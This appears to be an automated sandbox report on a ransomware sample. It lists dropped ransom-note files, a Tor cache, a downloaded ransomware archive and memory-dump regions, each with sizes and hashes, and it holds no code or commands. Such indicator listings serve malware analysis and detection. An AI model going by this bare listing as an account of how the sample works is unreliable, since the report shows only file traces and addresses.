                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\OneNote\16.0\_R_E_A_D___T_H_I_S___NEI2NG_.txt
                                                                                                                                    Filesize

                                                                                                                                    1KB

                                                                                                                                    MD5

                                                                                                                                    6ff773ea55bd0d088f47ae5d1f141277

                                                                                                                                    SHA1

                                                                                                                                    8e0b0226f8a9ee22906e272a40bf82a020067933

                                                                                                                                    SHA256

                                                                                                                                    23cac2d18aa175308964304465ee685a915b49cb24c0e7e2a50ecad9460ba9d2

                                                                                                                                    SHA512

                                                                                                                                    f46e97f09c9b3b1af220b06d363f0a226a157f6dea36217e5dca1ad68c7ef46ce08c64e5cb5e25e787f907f6d56713757eb203278acbba0d28b136dc00a648b5

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms
                                                                                                                                    Filesize

                                                                                                                                    10KB

                                                                                                                                    MD5

                                                                                                                                    7bef789766bdb6f83875a0340f7a438c

                                                                                                                                    SHA1

                                                                                                                                    6a85789ea8ebf827d5ab491c4235d1d520bd2659

                                                                                                                                    SHA256

                                                                                                                                    0f2f58b6ec42c9e0b1effdc089c22d65f1058a608b0f171a92d1746cafc1f290

                                                                                                                                    SHA512

                                                                                                                                    09b5d3c9ca99b7a9115454ef7b61d4686322f9875a165a6fb8cab746c631208c8ab68e37585488711c14aa0fb5a770cb95e4bd08d60ee3e2031e68194913a83b

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms
                                                                                                                                    Filesize

                                                                                                                                    7KB

                                                                                                                                    MD5

                                                                                                                                    ccb1123caa7f6c2a833621332b3aa294

                                                                                                                                    SHA1

                                                                                                                                    053cc294e2d35efb148b957994d3685701e786ac

                                                                                                                                    SHA256

                                                                                                                                    6ed2fce9fe670e19a7a3fb124fcd55b3011588cde1fa28dabcad4ecbed531085

                                                                                                                                    SHA512

                                                                                                                                    6fc2fa610f61d09e2d7168214349f36874df7c57c98c425989d0a4f5a810a593207c1de7b0c0628785cdca27861eabffbb8ba5b9203384cedcca0503b63fa325

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Roaming\tor\cached-microdescs.new
                                                                                                                                    Filesize

                                                                                                                                    14.0MB

                                                                                                                                    MD5

                                                                                                                                    c6a81a65d049079d85cc4eb73615b529

                                                                                                                                    SHA1

                                                                                                                                    98f342a8bd80af3af788dd45cc24ded3990692f8

                                                                                                                                    SHA256

                                                                                                                                    29a8103d3a540a57dbbceb35fee1ded3cbcd49aea14cb2398b2bfe54d92cc456

                                                                                                                                    SHA512

                                                                                                                                    290c1d938b160791baaa3fbd798a63b3ac44f599ec481defb3fd4a5bd0651593dfd979a9579e4f76b3d4094f95db288839ef077bbf2dd53b736cc4feef88dcc5

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\Documents\_R_E_A_D___T_H_I_S___6R04X67Z_.txt
                                                                                                                                    Filesize

                                                                                                                                    1KB

                                                                                                                                    MD5

                                                                                                                                    5e3225ad38b0d921c57fa963e15ba754

                                                                                                                                    SHA1

                                                                                                                                    a418b64b944450814416b0e786b1776630d950bb

                                                                                                                                    SHA256

                                                                                                                                    e25ed8955a487f070b28580d8f5d1c38377f8765bb842d4d5a9c5d5ef7aead4a

                                                                                                                                    SHA512

                                                                                                                                    5741dd94c2414d3b00718eded8a7f734700b32b7632cfb1cc5152b65a0a0ba138b32f7af6efa2a21a9b30e966bd856aca9855ca218d0bf9b16ad8e375aa4dd3c

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\Downloads\Ransomware-Samples-main.zip.crdownload
                                                                                                                                    Filesize

                                                                                                                                    15.1MB

                                                                                                                                    MD5

                                                                                                                                    e88a0140466c45348c7b482bb3e103df

                                                                                                                                    SHA1

                                                                                                                                    c59741da45f77ed2350c72055c7b3d96afd4bfc1

                                                                                                                                    SHA256

                                                                                                                                    bab1853454ca6fdd3acd471254101db1b805b601e309a49ec7b4b1fbcfc47ad7

                                                                                                                                    SHA512

                                                                                                                                    2dc9682f4fb6ea520acc505bdbe7671ab7251bf9abd25a5275f0c543a6157d7fa5325b9dce6245e035641ab831d646f0e14f6649f9464f5e97431ab1bf7da431

                                                                                                                                    Download Submit

                                                                                                                                  • \??\pipe\crashpad_4604_JRUCRARVZUBGMPBI
                                                                                                                                    MD5

                                                                                                                                    d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                    SHA1

                                                                                                                                    da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                    SHA256

                                                                                                                                    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                    SHA512

                                                                                                                                    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                    Download Submit

                                                                                                                                  • memory/1976-343-0x0000000000400000-0x0000000000435000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    212KB

                                                                                                                                    Download

                                                                                                                                  • memory/1976-706-0x0000000000440000-0x0000000000451000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    68KB

                                                                                                                                    Download

                                                                                                                                  • memory/1976-705-0x0000000000400000-0x0000000000435000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    212KB

                                                                                                                                    Download

                                                                                                                                  • memory/1976-682-0x0000000000400000-0x0000000000435000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    212KB

                                                                                                                                    Download

                                                                                                                                  • memory/1976-347-0x0000000000400000-0x0000000000435000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    212KB

                                                                                                                                    Download

                                                                                                                                  • memory/1976-340-0x0000000000400000-0x0000000000435000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    212KB

                                                                                                                                    Download

                                                                                                                                  • memory/2328-952-0x000000001CAA0000-0x000000001CB02000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    392KB

                                                                                                                                    Download

                                                                                                                                  • memory/2328-954-0x000000001D000000-0x000000001D052000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    328KB

                                                                                                                                    Download

                                                                                                                                  • memory/2328-951-0x000000001BC10000-0x000000001BCAC000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    624KB

                                                                                                                                    Download

                                                                                                                                  • memory/2328-953-0x0000000000EB0000-0x0000000000EB8000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    32KB

                                                                                                                                    Download

                                                                                                                                  • memory/2328-950-0x000000001C5D0000-0x000000001CA9E000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    4.8MB

                                                                                                                                    Download

                                                                                                                                  • memory/2740-1040-0x0000000010000000-0x0000000010010000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                    Download

                                                                                                                                  • memory/4304-723-0x00007FFC81F80000-0x00007FFC81F90000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                    Download

                                                                                                                                  • memory/4304-719-0x00007FFC856D0000-0x00007FFC856E0000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                    Download

                                                                                                                                  • memory/4304-949-0x00007FFC856D0000-0x00007FFC856E0000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                    Download

                                                                                                                                  • memory/4304-948-0x00007FFC856D0000-0x00007FFC856E0000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                    Download

                                                                                                                                  • memory/4304-947-0x00007FFC856D0000-0x00007FFC856E0000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                    Download

                                                                                                                                  • memory/4304-724-0x00007FFC81F80000-0x00007FFC81F90000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                    Download

                                                                                                                                  • memory/4304-720-0x00007FFC856D0000-0x00007FFC856E0000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                    Download

                                                                                                                                  • memory/4304-717-0x00007FFC856D0000-0x00007FFC856E0000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                    Download

                                                                                                                                  • memory/4304-946-0x00007FFC856D0000-0x00007FFC856E0000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                    Download

                                                                                                                                  • memory/4304-718-0x00007FFC856D0000-0x00007FFC856E0000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                    Download

                                                                                                                                  • memory/4736-3186-0x0000000000B40000-0x0000000000C28000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    928KB

                                                                                                                                    Download

                                                                                                                                  • memory/4736-3204-0x0000000002E00000-0x0000000002E0A000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    40KB

                                                                                                                                    Download

                                                                                                                                  • memory/4736-3206-0x00000000054F0000-0x0000000005582000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    584KB

                                                                                                                                    Download

                                                                                                                                  • memory/4736-3207-0x0000000005A60000-0x0000000005B36000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    856KB

                                                                                                                                    Download

                                                                                                                                  • memory/4736-3208-0x00000000054B0000-0x00000000054BC000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    48KB

                                                                                                                                    Download

                                                                                                                                  • memory/4736-3211-0x0000000005690000-0x0000000005759000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    804KB

                                                                                                                                    Download

                                                                                                                                  • memory/4736-3212-0x0000000005890000-0x000000000592C000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    624KB

                                                                                                                                    Download

                                                                                                                                  • memory/4892-989-0x00000000098F0000-0x000000000990A000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    104KB

                                                                                                                                    Download

                                                                                                                                  • memory/4892-965-0x0000000004FC0000-0x0000000004FF6000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    216KB

                                                                                                                                    Download

                                                                                                                                  • memory/4892-966-0x0000000007E50000-0x0000000008478000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    6.2MB

                                                                                                                                    Download

                                                                                                                                  • memory/4892-967-0x0000000007A30000-0x0000000007A52000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    136KB

                                                                                                                                    Download

                                                                                                                                  • memory/4892-968-0x0000000007CB0000-0x0000000007D16000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    408KB

                                                                                                                                    Download

                                                                                                                                  • memory/4892-969-0x0000000007AD0000-0x0000000007B36000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    408KB

                                                                                                                                    Download

                                                                                                                                  • memory/4892-970-0x0000000008480000-0x00000000087D0000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    3.3MB

                                                                                                                                    Download

                                                                                                                                  • memory/4892-971-0x0000000007D40000-0x0000000007D5C000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    112KB

                                                                                                                                    Download

                                                                                                                                  • memory/4892-972-0x0000000008850000-0x000000000889B000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    300KB

                                                                                                                                    Download

                                                                                                                                  • memory/4892-973-0x0000000008AE0000-0x0000000008B56000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    472KB

                                                                                                                                    Download

                                                                                                                                  • memory/4892-988-0x000000000A220000-0x000000000A898000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    6.5MB

                                                                                                                                    Download

                                                                                                                                  • memory/5028-2396-0x0000000070830000-0x0000000070A4C000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    2.1MB

                                                                                                                                    Download

                                                                                                                                  • memory/5028-2390-0x00000000000A0000-0x000000000039E000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    3.0MB

                                                                                                                                    Download

                                                                                                                                  • memory/5028-2380-0x00000000000A0000-0x000000000039E000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    3.0MB

                                                                                                                                    Download

                                                                                                                                  • memory/5028-2379-0x0000000070830000-0x0000000070A4C000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    2.1MB

                                                                                                                                    Download

                                                                                                                                  • memory/5028-2376-0x0000000070B00000-0x0000000070B1C000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    112KB

                                                                                                                                    Download

                                                                                                                                  • memory/5028-2377-0x0000000070AD0000-0x0000000070AF2000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    136KB

                                                                                                                                    Download

                                                                                                                                  • memory/5028-2378-0x0000000070A50000-0x0000000070AC7000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    476KB

                                                                                                                                    Download

                                                                                                                                  • memory/5028-2375-0x0000000070B20000-0x0000000070BA2000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    520KB

                                                                                                                                    Download

                                                                                                                                  • memory/5028-2373-0x00000000000A0000-0x000000000039E000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    3.0MB

                                                                                                                                    Download

                                                                                                                                  • memory/5028-2374-0x0000000070BB0000-0x0000000070C32000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    520KB

                                                                                                                                    Download

                                                                                                                                  • memory/5028-2358-0x00000000000A0000-0x000000000039E000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    3.0MB

                                                                                                                                    Download

                                                                                                                                  • memory/5028-2356-0x0000000070B20000-0x0000000070BA2000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    520KB

                                                                                                                                    Download

                                                                                                                                  • memory/5028-2357-0x0000000070AD0000-0x0000000070AF2000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    136KB

                                                                                                                                    Download

                                                                                                                                  • memory/5028-2355-0x0000000070830000-0x0000000070A4C000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    2.1MB

                                                                                                                                    Download

                                                                                                                                  • memory/5028-2354-0x0000000070BB0000-0x0000000070C32000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    520KB

                                                                                                                                    Download